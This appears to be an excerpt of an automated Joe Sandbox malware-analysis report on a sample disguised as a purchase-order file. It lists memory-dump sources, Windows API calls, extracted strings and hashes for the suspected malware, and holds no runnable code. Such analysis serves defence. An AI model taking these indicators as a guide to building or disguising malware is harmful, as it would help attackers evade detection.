                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3974789173-0
                                                                                                                                                                                                      • Opcode ID: 087a434cbdc5e7cbb2fa216e54f86e3f40d69627f63294deb5c65b9fe4df2c89
                                                                                                                                                                                                      • Instruction ID: d5ae466aed75c77a4d15beb372450120c68d71961851cf8e8349648a48651166
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 087a434cbdc5e7cbb2fa216e54f86e3f40d69627f63294deb5c65b9fe4df2c89
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8E04F32A022119BD7202FB15C0CB4B3BA9EF55795F118C2CA641D6080DA2884018769
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSysColor.USER32(00000008), ref: 0041B496
                                                                                                                                                                                                      • SetTextColor.GDI32(?,000000FF), ref: 0041B4A0
                                                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 0041B4B5
                                                                                                                                                                                                      • GetStockObject.GDI32(00000005), ref: 0041B4BD
                                                                                                                                                                                                      • GetWindowDC.USER32(?,00000000), ref: 0047DE2B
                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0047DE38
                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0047DE51
                                                                                                                                                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0047DE6A
                                                                                                                                                                                                      • GetPixel.GDI32(00000000,?,?), ref: 0047DE8A
                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 0047DE95
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1946975507-0
                                                                                                                                                                                                      • Opcode ID: 189145e5aca8d1de6ef1204376cf97e8232d643d62abcfa75d3e90a97d7aee34
                                                                                                                                                                                                      • Instruction ID: ebc7ae97a81ee43cd2b7e44fa5307cd1c78914befb32965c7e0958ce0b8f082e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 189145e5aca8d1de6ef1204376cf97e8232d643d62abcfa75d3e90a97d7aee34
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 50E06D31900240AADF216F74EC0DBDD3B22AF51335F04CA2BF669580E2C3754980CB15
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0043B2DF
                                                                                                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 0043B2EB
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0043B2F4
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0043B2FC
                                                                                                                                                                                                        • Part of subcall function 0043AB24: GetProcessHeap.KERNEL32(00000000,?,0043A848), ref: 0043AB2B
                                                                                                                                                                                                        • Part of subcall function 0043AB24: HeapFree.KERNEL32(00000000), ref: 0043AB32
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                                                      • Opcode ID: 140da9e2f99dc4dd29c9a508007645021f580a2755418cc36269d399ee6704c3
                                                                                                                                                                                                      • Instruction ID: a739e54aae2a3a9cd22030b7aca237d8105e1b6acd56b05ad55d5797ed03ab16
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 140da9e2f99dc4dd29c9a508007645021f580a2755418cc36269d399ee6704c3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7E0BF36505005BBDB013B95DC0885DFB66FF983213108635F615815B1CB32A871EB55
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                      • Opcode ID: ec67915f06b264683b49137b804281f4acd025879a02d45731f49f2f4a66ca92
                                                                                                                                                                                                      • Instruction ID: ac55191bf5dc09552fbdaeed682a17cbe62f7bb7b12c61747605478ce30e63c9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ec67915f06b264683b49137b804281f4acd025879a02d45731f49f2f4a66ca92
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0E01AB1901208EFDB016F708848A6D7BA5EB4C354F11C82AF95A97291EA7898418B49
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                      • Opcode ID: 40d13639704ad495b622b523cbcbeb9e56c1aabbfad60d149bac482c6001f4f6
                                                                                                                                                                                                      • Instruction ID: 1d14186068ba132644a7ce174cc16f4ac5b7c4f797403fb1499130b6af5a5e45
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40d13639704ad495b622b523cbcbeb9e56c1aabbfad60d149bac482c6001f4f6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DDE04FB1900204EFDB006F70C84866D7BA5FB4C354F11882EF95AD7290EB7898418B48
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: pow
                                                                                                                                                                                                      • API String ID: 0-2276729525
                                                                                                                                                                                                      • Opcode ID: bf940d06f8f9fc6b1ae281b5996f9320640e1f50f97d758281a0619ba68a33ed
                                                                                                                                                                                                      • Instruction ID: f85d35959db5812c1dcbfc92c00ad6970f6c3ff0118a47d81fc8bae499f7de7f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf940d06f8f9fc6b1ae281b5996f9320640e1f50f97d758281a0619ba68a33ed
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42519C71A08289CECB117B59CE4137A7BA0EB90750F308D3CF6D5862A9EF358CD59A46
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcscpy
                                                                                                                                                                                                      • String ID: I/G$I/G
                                                                                                                                                                                                      • API String ID: 3048848545-4201233942
                                                                                                                                                                                                      • Opcode ID: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
                                                                                                                                                                                                      • Instruction ID: 5b5fadca2aca936165ba25b9bf37a07b386b53b8396f083847d400d46c1348b3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 216820cd40ab9a3a1cd61449237ac12a5d4ff903a3d3ad20296fe9ad0a067895
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D41F771A00216AAEF24DF85D5419FEB770EF48314F90405BF881B7291DBB89E82C7AC
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 004044ED: __fread_nolock.LIBCMT ref: 0040450B
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0044C65D
                                                                                                                                                                                                      • _wcscmp.LIBCMT ref: 0044C670
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _wcscmp$__fread_nolock
                                                                                                                                                                                                      • String ID: FILE
                                                                                                                                                                                                      • API String ID: 4029003684-3121273764
                                                                                                                                                                                                      • Opcode ID: dcc397aec440af2ad813aa0669c94931f0cf7e601968377577617a591bb2fdd1
                                                                                                                                                                                                      • Instruction ID: d6fd1d98c24f378f3689914d9611b9600f4530d8b2fd317d4f5c4972b7240fa3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dcc397aec440af2ad813aa0669c94931f0cf7e601968377577617a591bb2fdd1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3241F972A0021ABBDF109AA5DC81FEF77B9DF89704F00407AF605FB181D6789A04C769
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 0046A85A
                                                                                                                                                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0046A86F
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                      • String ID: '
                                                                                                                                                                                                      • API String ID: 3850602802-1997036262
                                                                                                                                                                                                      • Opcode ID: 1ce9c5eab0d880a096e178a50c728c1281ac5d3fcda1428f2d726b8c76c426d8
                                                                                                                                                                                                      • Instruction ID: 05b9b359a9089e5631400059deb0dd6c5e581389fb3afd8405a1aacd88250687
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ce9c5eab0d880a096e178a50c728c1281ac5d3fcda1428f2d726b8c76c426d8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17410A74E017099FDB54DF64C880BDABBB5FF09304F10016AE905AB351E774A952CF96
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 0046980E
                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0046984A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$DestroyMove
                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                      • API String ID: 2139405536-2160076837
                                                                                                                                                                                                      • Opcode ID: ef457bd2461c8dff2cf81eda30860f1367b64f41b894c03d079e3cd50b041c1a
                                                                                                                                                                                                      • Instruction ID: d9788c9899c7522218275ab4addd7f73f4a76ae600fffe49f6da806261780b35
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef457bd2461c8dff2cf81eda30860f1367b64f41b894c03d079e3cd50b041c1a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B318F71510604AADB109F35CC80BFB73ADFF59764F10861EF9A9C7190EA74AC81C769
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 004451C6
                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00445201
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InfoItemMenu_memset
                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                      • API String ID: 2223754486-4108050209
                                                                                                                                                                                                      • Opcode ID: 8b80eb4c242ff8015c841baeeec5b5229a0f17c1c55c3c25716007ff3982c034
                                                                                                                                                                                                      • Instruction ID: 5b10929a3873ab4178e6ce3d4b5ff2fbe3bc7aec09b2f3309b6731db4349dc23
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8b80eb4c242ff8015c841baeeec5b5229a0f17c1c55c3c25716007ff3982c034
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9631E531A00208ABFF24CF99D845B9FBBF4BF45350F14405FE981A62A2D7B89944CF19
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __snwprintf
                                                                                                                                                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                                                      • API String ID: 2391506597-2584243854
                                                                                                                                                                                                      • Opcode ID: 8e014c34945cad930d2a336b774e75bf7b9cd83839c64762cf43a85639d646fb
                                                                                                                                                                                                      • Instruction ID: fee805f44d74d647617933fdb8fb0fcedd988ae0d96ca396d508efdd7dfb75b5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8e014c34945cad930d2a336b774e75bf7b9cd83839c64762cf43a85639d646fb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11218671A00114ABCF14EF55C881FEE77B4AF45305F51046FF805AB182DB78E949CBA9
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0046945C
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00469467
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                      • String ID: Combobox
                                                                                                                                                                                                      • API String ID: 3850602802-2096851135
                                                                                                                                                                                                      • Opcode ID: a2ee0d10134b556b24ff81701b058da409ae0cf6f9f97c1d448d392aa4014ca9
                                                                                                                                                                                                      • Instruction ID: 0958ac638f35600e6680e70f277b7a25b188f367ae3316ed6a952ac5d0afe81a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2ee0d10134b556b24ff81701b058da409ae0cf6f9f97c1d448d392aa4014ca9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC11B6713042087FEF119F54DC80EBB376EEB483A4F10012AF91497390E6799C528769
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0041D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0041D1BA
                                                                                                                                                                                                        • Part of subcall function 0041D17C: GetStockObject.GDI32(00000011), ref: 0041D1CE
                                                                                                                                                                                                        • Part of subcall function 0041D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0041D1D8
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00469968
                                                                                                                                                                                                      • GetSysColor.USER32(00000012), ref: 00469982
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                      • String ID: static
                                                                                                                                                                                                      • API String ID: 1983116058-2160076837
                                                                                                                                                                                                      • Opcode ID: dc8e27ef5aeff02486cdc16f77dbb5bc8abffe54765a41134c13d0c8190d2f45
                                                                                                                                                                                                      • Instruction ID: 298e3bd79bdac7eea84c9a0c33d59882faeeb666d7678b2b6b60e360f338a6ae
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc8e27ef5aeff02486cdc16f77dbb5bc8abffe54765a41134c13d0c8190d2f45
